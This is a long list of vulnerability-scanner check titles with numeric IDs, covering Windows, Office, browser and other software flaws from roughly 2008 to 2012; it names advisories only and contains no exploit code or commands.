Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine [903037] Microsoft JScript and VBScript Engines Remote Code Execution Vulnerability (2706045) [903030] Google Chrome Multiple Vulnerabilities(02) - May 12 (Windows) [903029] Apple Safari Multiple Vulnerabilities - Oct 2011 (Windows) [903026] Microsoft Office Remote Code Execution Vulnerabilities (2663830) [903017] Microsoft Office Remote Code Execution Vulnerability (2639185) [903014] Adobe Flash Player/Air Code Execution and DoS Vulnerabilities (Windows) [903007] Google Chrome Full Sandbox Escape and Code Execution Vulnerability (Windows) [903004] Google Chrome Multiple Vulnerabilities (Windows) - Mar 12 [903003] GOM Media Player 'Open URL' Feature Unspecified Vulnerability (Windows) [903002] GOM Media Player 'AVI' File Unspecified Vulnerability (Windows) [903000] Microsoft Expression Design Remote Code Execution Vulnerability (2651018) [902934] Microsoft .NET Framework Remote Code Execution Vulnerability (2745030) [902932] Microsoft Internet Explorer Multiple Use-After-Free Vulnerabilities (2761451) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902930] Microsoft Office Remote Code Execution Vulnerabilities (2720184) [902923] Microsoft Internet Explorer Multiple Vulnerabilities (2722913) [902922] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2723135) [902921] Microsoft Office Visio/Viewer Remote Code Execution Vulnerability (2733918) [902920] Microsoft Office Remote Code Execution Vulnerability (2731879) [902919] Microsoft SharePoint Privilege Elevation Vulnerabilities (2663841) [902917] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2709162) [902914] Microsoft IIS GET Request Denial of Service Vulnerability [902913] Microsoft Office Remote Code Execution Vulnerabilities-2663830 (Mac OS X) [902912] Microsoft Office Word Remote Code Execution Vulnerability-2680352 (Mac OS X) [902911] Microsoft Office Word Remote Code Execution Vulnerability (2680352) [902910] Microsoft Office Visio Viewer Remote Code Execution Vulnerability (2597981) [902907] Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2641653) [902903] Google Chrome Multiple Vulnerabilities - Jan12 (Windows) [902842] Microsoft Lync Remote Code Execution Vulnerabilities (2707956) [902841] Microsoft .NET Framework Remote Code Execution Vulnerability (2706726) [902839] Microsoft FrontPage Server Extensions MS-DOS Device Name DoS Vulnerability [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows) [902836] PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability (Windows) [902833] Microsoft .NET Framework Remote Code Execution Vulnerability (2693777) [902832] MS Security Update For Microsoft Office, .NET Framework, and Silverlight (2681578) [902828] Microsoft .NET Framework Remote Code Execution Vulnerability (2671605) [902818] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902817] Microsoft Visual Studio Privilege Elevation Vulnerability (2651019) [902811] Microsoft .NET Framework and Microsoft Silverlight Remote Code Execution Vulnerabilities (2651026) [902810] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2660465) [902808] IBM Lotus Symphony Image Object Integer Overflow Vulnerability (Windows) [902798] Microsoft SMB Signing Enabled and Not Required At Server [902797] Microsoft SMB Signing Information Disclosure Vulnerability [902796] Microsoft IIS IP Address/Internal Network Name Disclosure Vulnerability [902792] MS Windows Indeo Codec Remote Code Execution Vulnerability (2661637) [902791] MS Windows Color Control Panel Remote Code Execution Vulnerability (2643719) [902786] Oracle VM VirtualBox Multiple Unspecified Vulnerabilities (Windows) [902785] Microsoft AntiXSS Library Information Disclosure Vulnerability (2607664) [902781] Windows Media Player Denial Of Service Vulnerability [902775] Mozilla Products Multiple Vulnerabilities - Dec 11 (Windows) [902774] Mozilla Products DOMAttrModified Memory Corruption Vulnerability (Windows) [902770] FFFTP Untrusted Search Path Vulnerability (Windows) - Dec 11 [902768] MS Windows Active Directory Remote Code Execution Vulnerability (2640045) [902767] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902765] Adobe Flex SDK 'SWF' Files Cross-Site Scripting Vulnerability (Windows) [902760] ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows) [902746] Microsoft Active Accessibility Remote Code Execution Vulnerability (2623699) [902738] Adobe Flash Player Multiple Vulnerabilities September-2011 (Windows) [902727] Microsoft Office Excel Remote Code Execution Vulnerabilities (2587505) [902709] Adobe Air and Flash Player Multiple Vulnerabilities August-2011 (Windows) [902708] Microsoft Remote Desktop Protocol Denial of Service Vulnerability (2570222) [902705] VLC Media Player '.AVI' File BOF Vulnerability (Windows) [902704] VLC Media Player '.RM' File BOF Vulnerability (Windows) [902696] Microsoft Internet Explorer Multiple Vulnerabilities (2761465) [902692] Microsoft Office Excel ReadAV Arbitrary Code Execution Vulnerability [902689] Microsoft SQL Server Report Manager Cross Site Scripting Vulnerability (2754849) [902688] Microsoft System Center Configuration Manager XSS Vulnerability (2741528) [902686] Microsoft Internet Explorer Multiple Vulnerabilities (2719177) [902683] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2685939) [902682] Microsoft Internet Explorer Multiple Vulnerabilities (2699988) [902679] Google SketchUp '.SKP' File Remote Code Execution Vulnerability (Windows) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [902670] Microsoft Internet Explorer Multiple Vulnerabilities (2675157) [902669] Windows Authenticode Signature Remote Code Execution Vulnerability (2653956) [902666] Opera Multiple Vulnerabilities - March12 (Windows) [902663] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902662] MicroSoft SMB Server Trans2 Request Remote Code Execution Vulnerability [902660] Microsoft SMB Transaction Parsing Remote Code Execution Vulnerability [902658] Microsoft RDP Server Private Key Information Disclosure Vulnerability [902657] Windows ClickOnce Application Installer Remote Code Execution Vulnerability (2584146) [902653] MS Windows C Run-Time Library Remote Code Execution Vulnerability (2654428) [902649] Microsoft Internet Explorer Multiple Vulnerabilities (2647516) [902645] Google Chrome Multiple Vulnerabilities - December11 (Windows) [902643] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2620712) [902642] Microsoft Internet Explorer Multiple Vulnerabilities (2618444) [902638] Apple iTunes Remote Code Execution Vulnerability (Windows) [902635] Google Chrome V8 Remote Code Execution Vulnerability (Windows) [902626] Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048) [902625] Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858) [902614] Google Chrome Secure Cookie Security Bypass Vulnerability (Windows) [902613] Microsoft Internet Explorer Multiple Vulnerabilities (2559049) [902603] VLC Media Player XSPF Playlist Integer Overflow Vulnerability (Windows) [902581] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2604930) [902580] Microsoft Host Integration Server Denial of Service Vulnerabilities (2607670) [902567] Microsoft Office Remote Code Execution Vulnerabilites (2587634) [902561] McAfee SaaS Endpoint Protection Version Detection (Windows) [902552] Microsoft .NET Framework Chart Control Information Disclosure Vulnerability (2567943) [902551] Microsoft .NET Framework Information Disclosure Vulnerability (2567951) [902549] Oracle VM VirtualBox Unspecified Vulnerability (Windows) [902546] IBM Informix Dynamic Server Oninit Remote Code Execution Vulnerability (Windows) [902545] IBM Informix Dynamic Server Version Detection (Windows) [902538] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2555917) [902529] ejabberd Version Detection (Windows) [902527] ejabberd XML Parsing Denial of Service Vulnerability (Windows) [902525] Oracle Java SE Multiple Unspecified Vulnerabilities 01 - June11 (Windows) [902524] Oracle Java SE Multiple Unspecified Vulnerabilities - June11 (Windows) [902523] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2514842) [902522] Microsoft .NET Framework Remote Code Execution Vulnerability (2538814) [902518] Microsoft .NET Framework Security Bypass Vulnerability [902502] Microsoft .NET Framework Remote Code Execution Vulnerability (2484015) [902501] Microsoft JScript and VBScript Scripting Engines Remote Code Execution Vulnerability (2514666) [902499] MS Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2646524) [902496] Microsoft Office IME (Chinese) Privilege Elevation Vulnerability (2652016) [902495] Microsoft Office Remote Code Execution Vulnerability (2590602) [902494] Microsoft Office Excel Remote Code Execution Vulnerability (2640241) [902493] Microsoft Publisher Remote Code Execution Vulnerabilities (2607702) [902492] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2639142) [902486] Windows Mail and Windows Meeting Space Remote Code Execution Vulnerability (2620704) [902485] Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2617657) [902483] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902482] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability (2592799) [902464] Microsoft Visio Remote Code Execution Vulnerabilities (2560978) [902455] Microsoft Visio Remote Code Execution Vulnerability (2560847) [902445] Microsoft XML Editor Information Disclosure Vulnerability (2543893) [902444] MS Windows Threat Management Gateway Firewall Client Remote Code Execution Vulnerability (2520426 [902443] Microsoft Internet Explorer Multiple Vulnerabilities (2530548) [902442] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability [902441] Windows MHTML Information Disclosure Vulnerability (2544893) [902430] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2545814) [902424] MS Windows Ancillary Function Driver Privilege Elevation Vulnerabilities (2645640) [902423] Microsoft Office Visio Viewer Remote Code Execution Vulnerabilities (2663510) [902411] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2489283) [902410] Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279) [902409] Windows MHTML Information Disclosure Vulnerability (2503658) [902408] Windows Fax Cover Page Editor Remote Code Execution Vulnerability (2527308) [902400] Adobe Products Remote Memory Corruption Vulnerability (Windows) [902399] LibreOffice LWP File Processing Multiple Buffer Overflow Vulnerabilities (Windows) [902398] LibreOffice Version Detection (Windows) [902395] Microsoft Bluetooth Stack Remote Code Execution Vulnerability (2566220) [902392] Google Chrome Multiple Vulnerabilities (Windows) - June 11 [902387] Adobe Reader/Acrobat Security Bypass Vulnerability (Windows) [902382] Google Chrome Multiple Vulnerabilities May11 (Windows) [902379] Adobe Reader/Acrobat Memory Corruption Vulnerability (Windows) [902378] Microsoft Office Excel Remote Code Execution Vulnerabilities (2537146) [902373] Adobe Audition '.ses' Multiple Buffer Overflow Vulnerabilities (Windows) [902365] Microsoft GDI+ Remote Code Execution Vulnerability (2489979) [902364] Microsoft Office Remote Code Execution Vulnerabilites (2489293) [902363] Windows OpenType Compact Font Format (CFF) Driver Remote Code Execution Vulnerability (2507618) [902353] Oracle Java SE Code Execution Vulnerabilities (Windows) [902351] Microsoft Groove Remote Code Execution Vulnerability (2494047) [902350] Oracle Java SE Code Execution Vulnerability (Windows-01) [902349] Oracle Java SE Code Execution Vulnerability (Windows) [902347] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902344] Oracle Java SE Multiple Unspecified Vulnerabilities (Windows) [902341] VLC Media Player USF and Text Subtitles Decoders BOF Vulnerabilities (Windows) [902340] VLC Media Player '.mkv' Code Execution Vulnerability (Windows) [902336] Microsoft JScript and VBScript Scripting Engines Information Disclosure Vulnerability (2475792) [902334] Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) [902333] Tor Unspecified Heap Based Buffer Overflow Vulnerability (Windows) [902325] Microsoft Internet Explorer 'CSS Import Rule' Use-after-free Vulnerability [902324] Microsoft SharePoint Could Allow Remote Code Execution Vulnerability (2455005) [902323] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (981957) [902322] Windows Local Procedure Call Privilege Elevation Vulnerability (2360937) [902319] Microsoft Foundation Classes Could Allow Remote Code Execution Vulnerability (2387149) [902306] Mozilla Products 'js_InitRandom' Information Disclosure Vulnerability (Windows) [902305] Mozilla Firefox Information Disclosure Vulnerability (Windows) [902303] Adobe Products Content Code Execution Vulnerability (Windows) [902301] Windows Client/Server Runtime Subsystem Privilege Elevation Vulnerability (2121546) [902293] Metasploit Framework Version Detection (Windows) [902288] Microsoft Kerberos Privilege Escalation Vulnerabilities (2496930) [902287] Microsoft Visio Remote Code Execution Vulnerabilities (2451879) [902285] Microsoft Internet Explorer Information Disclosure Vulnerability (2501696) [902278] MS Windows ICSW Remote Code Execution Vulnerability (2443105) [902275] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2436673) [902274] Microsoft Publisher Remote Code Execution Vulnerability (2292970) [902265] Microsoft Office Word Remote Code Execution Vulnerabilities (2293194) [902264] Microsoft Office Excel Remote Code Execution Vulnerabilities (2293211) [902255] Microsoft Visual Studio Insecure Library Loading Vulnerability [902254] Microsoft Office Products Insecure Library Loading Vulnerability [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [902246] Microsoft Internet Explorer 'toStaticHTML()' Cross Site Scripting Vulnerability [902243] Microsoft Outlook TNEF Remote Code Execution Vulnerability (2315011) [902242] Mozilla Products Insecure Library Loading Vulnerability (Windows) [902239] Wireshark File Opening Insecure Library Loading Vulnerability (Windows) [902238] Skype Insecure Library Loading Vulnerability (Windows) [902230] Microsoft .NET Common Language Runtime Remote Code Execution Vulnerability (2265906) [902229] Microsoft Window MPEG Layer-3 Remote Code Execution Vulnerability (2115168) [902228] Microsoft Office Word Remote Code Execution Vulnerabilities (2269638) [902217] Microsoft Outlook SMB Attachment Remote Code Execution Vulnerability (978212) [902210] Microsoft IE cross-domain IFRAME gadgets keystrokes steal Vulnerability [902204] Mozilla Products Multiple Vulnerabilities june-10 (Windows) [902203] Opera Browser Multiple Vulnerabilities (Windows) [902197] Wireshark SMB PIPE Dissector Denial of Service Vulnerability (Windows) [902196] Wireshark SMB dissector Denial of Service Vulnerability (Windows) [902195] Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows) [902193] Microsoft .NET Framework XML HMAC Truncation Vulnerability (981343) [902192] Microsoft Office COM Validation Remote Code Execution Vulnerability (983235) [902191] Microsoft Internet Explorer Multiple Vulnerabilities (982381) [902186] Mozilla Firefox Multiple Denial Of Service vulnerabilities (Windows) [902185] Mozilla Products 'IFRAME' Denial Of Service vulnerability (Windows) [902183] Microsoft Internet Explorer 'IFRAME' Denial Of Service Vulnerability [902182] Opera Browser Multiple Denial Of Service Vulnerability (Windows) [902178] Microsoft Visual Basic Remote Code Execution Vulnerability (978213) [902176] Microsoft SharePoint '_layouts/help.aspx' Cross Site Scripting Vulnerability [902167] Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows) [902166] Microsoft Internet Explorer 'neutering' Mechanism XSS Vulnerability [902161] Adobe Acrobat and Reader PDF Handling Multiple Vulnerabilities (Windows) [902159] Microsoft VBScript Scripting Engine Remote Code Execution Vulnerability (980232) [902158] Microsoft Office Publisher Remote Code Execution Vulnerability (981160) [902157] Microsoft 'ISATAP' Component Spoofing Vulnerability (978338) [902156] Microsoft SMB Client Remote Code Execution Vulnerabilities (980232) [902155] Microsoft Internet Explorer Multiple Vulnerabilities (980182) [902151] Microsoft Internet Explorer Denial of Service Vulnerability - Mar10 [902149] Mozilla Products Multiple Vulnerabilities Mar-10 (Windows) [902147] Mozilla Firefox Unspecified Vulnerability Mar-10 (Windows) [902133] Microsoft Office Excel Multiple Vulnerabilities (980150) [902130] Mozilla Products Multiple Vulnerabilities feb-10 (Windows) [902128] Adobe Acrobat and Reader PDF Handling Code Execution Vulnerability (Windows) [902120] Google Chrome Multiple Vulnerabilities - (Windows) [902117] Microsoft DirectShow Remote Code Execution Vulnerability (977935) [902116] Microsoft Client/Server Run-time Subsystem Privilege Elevation Vulnerability (978037) [902115] Microsoft Kerberos Denial of Service Vulnerability (977290) [902114] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (975416) [902112] Microsoft SMB Client Remote Code Execution Vulnerabilities (978251) [902098] Novell iPrint Client Multiple Vulnerabilities (windows) [902095] Microsoft Office Excel Remote Code Execution Vulnerability (2269707) [902080] Microsoft Help and Support Center Remote Code Execution Vulnerability (2229593) [902075] XnView 'MBM' Processing Buffer Overflow Vulnerability (Windows) [902073] Google Chrome 'WebKit' Multiple Vulnerabilities (Windows) - June 10 [902069] Microsoft SharePoint Privilege Elevation Vulnerabilities (2028554) [902068] Microsoft Office Excel Remote Code Execution Vulnerabilities (2027452) [902060] Cybozu Office Authentication Bypass Vulnerability (Windows) [902045] aMSN session hijack vulnerability (Windows) [902044] aMSN Version Detection (Windows) [902039] Microsoft Visio Remote Code Execution Vulnerabilities (980094) [902038] Microsoft MPEG Layer-3 Codecs Remote Code Execution Vulnerability (977816) [902027] Mozilla Firefox Unspecified Vulnerability (Windows) [902015] Microsoft Paint Remote Code Execution Vulnerability (978706) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) [901208] Microsoft Internet Explorer Multiple Vulnerabilities (2586448) [901197] Google Chrome multiple vulnerabilities - March 11 (Windows) [901190] Google Chrome Use-After-Free Vulnerability (Windows) [901182] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2479628) [901181] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2476687) [901180] Microsoft Internet Explorer Multiple Vulnerabilities (2482017) [901174] OpenSC Version Detection (Windows) [901173] Windows Backup Manager Remote Code Execution Vulnerability (2478935) [901166] Microsoft Office Remote Code Execution Vulnerabilites (2423930) [901165] Windows Common Control Library Remote Code Execution Vulnerability (2296011) [901162] Microsoft Internet Explorer Multiple Vulnerabilities (2360131) [901161] Microsoft ASP.NET Information Disclosure Vulnerability (2418042) [901153] Google Chrome multiple vulnerabilities Sep-10 (Windows) [901151] Microsoft Internet Information Services Remote Code Execution Vulnerabilities (2267960) [901145] FreeType Unspecified Vulnerability (Windows) [901144] FreeType Version Detection (Windows) [901143] FreeType Memory Corruption and Buffer Overflow Vulnerabilities (Windows) [901142] FreeType Multiple denial of service vulnerabilities (Windows) [901139] Microsoft Internet Explorer Multiple Vulnerabilities (2183461) [901120] Microsoft IIS Authentication Remote Code Execution Vulnerability (982666) [901097] Microsoft Internet Explorer Multiple Vulnerabilities (978207) [901095] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (972270) [901082] IBM DB2 UDB Multiple Unspecified Vulnerabilities (Windows) [901069] Microsoft Office Project Remote Code Execution Vulnerability (967183) [901047] MS Windows License Logging Server Remote Code Execution Vulnerability (974783) [901041] Microsoft Internet Explorer Multiple Code Execution Vulnerabilities (974455) [901039] Vulnerabilities in Windows Media Runtime Could Allow Remote Code Execution (975682) [900973] Microsoft Office Word Remote Code Execution Vulnerability (976307) [900964] Microsoft .NET Common Language Runtime Code Execution Vulnerability (974378) [900944] Microsoft IIS FTP Server 'ls' Command DOS Vulnerability [900929] Microsoft JScript Scripting Engine Remote Code Execution Vulnerability (971961) [900898] Microsoft Internet Explorer 'XSS Filter' XSS Vulnerabilities - Nov09 [900897] Microsoft Internet Explorer PDF Information Disclosure Vulnerability - Nov09 [900891] Microsoft Internet Denial Of Service Vulnerability - Nov09 [900887] Microsoft Office Excel Multiple Vulnerabilities (972652) [900878] Microsoft Products GDI Plus Code Execution Vulnerabilities (957488) [900874] Microsoft IIS FTP Service Remote Code Execution Vulnerabilities (975254) [900863] Microsoft Internet Explorer 'window.print()' DOS Vulnerability [900837] Microsoft DHTML Editing Component ActiveX Remote Code Execution Vulnerability (956844) [900836] Microsoft Internet Explorer Address Bar Spoofing Vulnerability [900826] Microsoft Internet Explorer 'location.hash' DOS Vulnerability [900813] Microsoft Remote Desktop Connection Remote Code Execution Vulnerability (969706) [900809] Microsoft Visual Studio ATL Remote Code Execution Vulnerability (969706) [900808] Microsoft Visual Products Version Detection [900799] Ruby Interpreter Version Detection (Windows) [900752] XnView DICOM Parsing Integer Overflow Vulnerability (Windows) [900741] Microsoft Internet Explorer Information Disclosure Vulnerability Feb10 [900725] Ruby Interpreter Heap Overflow Vulnerability (Windows) - Dec09 [900724] Windows XP 'SPI_GETDESKWALLPAPER' DoS Vulnerability [900711] Microsoft IIS WebDAV Remote Authentication Bypass Vulnerability [900690] Microsoft Virtual PC/Server Privilege Escalation Vulnerability (969856) [900689] Microsoft Embedded OpenType Font Engine Remote Code Execution Vulnerabilities (961371)) [900670] Microsoft Office Excel Remote Code Execution Vulnerabilities (969462) [900669] Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537) [900589] Microsoft ISA Server Privilege Escalation Vulnerability (970953) [900588] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900567] Microsoft IIS Security Bypass Vulnerability (970483) [900566] Microsoft Active Directory LDAP Remote Code Execution Vulnerability (969805) [900479] PostgreSQL Version Detection (Windows) [900476] Microsoft Excel Remote Code Execution Vulnerabilities (968557) [900461] Microsoft MSN Live Messneger Denial of Service Vulnerability [900445] Microsoft Autorun Arbitrary Code Execution Vulnerability (08-038) [900400] Microsoft Internet Explorer Unicode String DoS Vulnerability [900391] Microsoft Office Publisher Remote Code Execution Vulnerability (969516) [900366] Microsoft Internet Explorer Web Script Execution Vulnerabilites [900365] Microsoft Office Word Remote Code Execution Vulnerabilities (969514) [900337] Microsoft Internet Explorer Denial of Service Vulnerability - Apr09 [900328] Microsoft Internet Explorer Remote Code Execution Vulnerability (963027) [900322] Tor Replay Attack Vulnerability (Windows) [900314] Microsoft XML Core Service Information Disclosure Vulnerability [900303] Microsoft Internet Explorer HTML Form Value DoS Vulnerability [900302] MS Windows taskmgr.exe Information Disclosure Vulnerability [900299] Microsoft Report Viewer Information Disclosure Vulnerability (2578230) [900298] MS Windows Remote Access Service NDISTAPI Driver Privilege Elevation Vulnerability (2566454) [900294] Microsoft Data Access Components Remote Code Execution Vulnerabilities (2560656) [900288] Microsoft Distributed File System Remote Code Execution Vulnerabilities (2535512) [900287] Microsoft SMB Client Remote Code Execution Vulnerabilities (2536276) [900285] Microsoft Foundation Class (MFC) Library Remote Code Execution Vulnerability (2500212) [900283] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2506223) [900282] Microsoft DNS Resolution Remote Code Execution Vulnerability (2509553) [900279] Microsoft SMB Client Remote Code Execution Vulnerabilities (2511455) [900278] Microsoft Internet Explorer Multiple Vulnerabilities (2497640) [900273] Microsoft Remote Desktop Client Remote Code Execution Vulnerability (2508062) [900267] Microsoft Media Decompression Remote Code Execution Vulnerability (2447961) [900262] Microsoft Internet Explorer Multiple Vulnerabilities (2416400) [900261] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2293386) [900246] Microsoft Media Decompression Remote Code Execution Vulnerability (979902) [900245] Microsoft Data Analyzer and IE Developer Tools ActiveX Control Vulnerability (980195) [900229] Microsoft Data Analyzer ActiveX Control Vulnerability (978262) [900228] Microsoft Office (MSO) Remote Code Execution Vulnerability (978214) [900223] Microsoft Ancillary Function Driver Elevation of Privilege Vulnerability (956803) [900218] IBM DB2 Server Detection (Windows) [900192] Microsoft Internet Explorer Information Disclosure Vulnerability [900187] Microsoft Internet Explorer Argument Injection Vulnerability [900170] Microsoft iExplorer '&NBSP [900131] Microsoft Internet Explorer Denial of Service Vulnerability [900128] CuteNews Version Detection for Windows [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [900123] Apple iTunes Version Detection for Windows [900120] Microsoft Organization Chart Remote Code Execution Vulnerability [900097] Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution [900095] Microsoft ISA Server and Forefront Threat Management Gateway DoS Vulnerability (961759) [900094] Vulnerabilities in Windows Could Allow Elevation of Privilege (959454) [900093] Microsoft DirectShow Remote Code Execution Vulnerability (961373) [900092] Windows HTTP Services Could Allow Remote Code Execution Vulnerabilities (960803) [900086] Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690) [900080] Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634) [900079] Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239) [900064] Vulnerability in Microsoft Office SharePoint Server Could Cause Elevation of Privilege (957175) [900063] Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (957173) [900061] Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (959070) [900060] Vulnerabilities in Windows Media Components Could Allow Remote Code Execution (959807) [900058] Microsoft XML Core Services Remote Code Execution Vulnerability (955218) [900052] Windows Internet Printing Service Allow Remote Code Execution Vulnerability (953155) [900051] Windows Kernel Elevation of Privilege Vulnerability (954211) [900048] Microsoft Excel Remote Code Execution Vulnerability (956416) [900047] Microsoft Office nformation Disclosure Vulnerability (957699) [900046] Microsoft Office Remote Code Execution Vulnerabilities (955047) [900045] Windows Media Player 11 Remote Code Execution Vulnerability (954154) [900044] Windows Media Encoder 9 Remote Code Execution Vulnerability (954156) [900036] Opera Version Detection for Windows [900034] Windows Messenger Could Allow Information Disclosure Vulnerability (955702) [900033] Microsoft PowerPoint Could Allow Remote Code Execution Vulnerabilities (949785) [900029] Microsoft Office Filters Could Allow Remote Code Execution Vulnerabilities (924090) [900028] Microsoft Excel Could Allow Remote Code Execution Vulnerabilities (954066) [900025] Microsoft Office Version Detection [900012] Enumerates List of Windows Hotfixes [900006] Microsoft Word Could Allow Remote Code Execution Vulnerability [900004] Microsoft Access Snapshot Viewer ActiveX Control Vulnerability [900003] Apple Safari Detect Script (Windows) [900002] Apple Safari for Windows Multiple Vulnerabilities July-08 [900001] Opera for Windows Unspecified Code Execution Vulnerabilities July-08 [855466] Solaris Update for OpenWindows 3.6.1 108117-06 [855393] Solaris Update for OpenWindows 3.6.2 111626-04 [855334] Solaris Update for OpenWindows 3.6.2 113792-01 [855246] Solaris Update for OpenWindows 3.7.3 119903-02 [855173] Solaris Update for OpenWindows 3.7.0 112811-02 [855057] Solaris Update for OpenWindows 3.6.2 110286-16 [803479] Adobe Acrobat Multiple Vulnerabilities - Windows [803456] Adobe Air Multiple Vulnerabilities - December12 (Windows) [803454] Adobe Air Multiple Vulnerabilities - November12 (Windows) [803451] Adobe Air Multiple Vulnerabilities - October 12 (Windows) [803354] Mozilla Thunderbird Multiple Vulnerabilities-02 November12 (Windows) [803353] Mozilla SeaMonkey Multiple Vulnerabilities-02 November12 (Windows) [803352] Mozilla Thunderbird ESR Multiple Vulnerabilities-01 November12 (Windows) [803351] Mozilla Thunderbird Multiple Vulnerabilities-01 November12 (Windows) [803350] Mozilla SeaMonkey Multiple Vulnerabilities-01 November12 (Windows) [803349] Mozilla Firefox ESR Multiple Vulnerabilities-01 November12 (Windows) [803347] Mozilla Firefox ESR Code Execution Vulnerabilities - November12 (Windows) [803336] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 03) [803335] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 02) [803334] Oracle Java SE JDK Multiple Vulnerabilities - February 2012 (Windows - 01) [803127] Google Chrome Multiple Vulnerabilities-03 Dec2012 (Windows) [803121] Google Chrome Multiple Vulnerabilities-02 Dec2012 (Windows) [803118] Google Chrome Multiple Vulnerabilities-01 Dec2012 (Windows) [803103] Oracle VM VirtualBox Unspecified Denial of Service Vulnerability (Windows) [803102] Pidgin MXit Message Parsing Buffer Overflow Vulnerability (Windows) [803086] LibreOffice XML Manifest Handling Buffer Overflow Vulnerabilities (Windows) [803084] LibreOffice Graphic Object Loading Buffer Overflow Vulnerability (Windows) [803083] OpenOffice Multiple Buffer Overflow Vulnerabilities - Dec12 (Windows) [803081] Adobe Photoshop Camera Raw Plug-in Code Execution Vulnerabilities (Windows) [803074] Adobe Flash Player Multiple Vulnerabilities - December12 (Windows) [803070] Wireshark Multiple Dissector Multiple Vulnerabilities - Dec12 (Windows) [803068] Wireshark Multiple Dissector Multiple DoS Vulnerabilities - Dec12 (Windows) [803064] LibreOffice Import Files Denial of Service Vulnerabilities (Windows) [803061] Mozilla Firefox Code Execution Vulnerabilities - November12 (Windows) [803059] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803057] Mozilla Firefox Multiple Vulnerabilities-02 November12 (Windows) [803055] Mozilla Firefox Multiple Vulnerabilities-01 November12 (Windows) [803047] Apple QuickTime Multiple Vulnerabilities - Nov12 (Windows) [803044] Adobe Flash Player Multiple Vulnerabilities - November12 (Windows) [803043] RealPlayer Watch Folders Function Buffer Overflow Vulnerability (Windows) [803040] Mozilla Firefox Multiple Vulnerabilities - November12 (Windows) [803038] Google SketchUp '.SKP' File Memory Corruption Vulnerability (Windows) [803028] Microsoft Internet Explorer Remote Code Execution Vulnerability (2757760) [803025] Adobe Photoshop PNG Image Processing Buffer Overflow Vulnerabilities (Windows) [803021] Oracle Java SE JRE AWT Component Unspecified Vulnerability - (Windows) [803020] Oracle Java SE JRE Multiple Remote Code Execution Vulnerabilities - (Windows) [803017] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803015] Mozilla Firefox Multiple Vulnerabilities - August12 (Windows) [803013] Mozilla Products Memory Corruption Vulnerabilities - August12 (Windows) [803011] Mozilla Products Multiple Vulnerabilities - August12 (Windows) [803001] Opera Multiple Vulnerabilities - August12 (Windows) [802996] Mozilla Firefox 'WebSockets' Denial of Service Vulnerability (Windows) [802994] Mozilla Firefox Multiple Vulnerabilities-01 (Windows) [802991] Mozilla Firefox Security Bypass Vulnerabilities - Oct 12 (Windows) [802989] Mozilla Firefox Multiple Vulnerabilities - Oct 12 (Windows) [802986] Adobe Flash Player Multiple Vulnerabilities - October 12 (Windows) [802985] VERITAS Backup Exec Remote Agent Windows Servers BOF Vulnerability [802978] 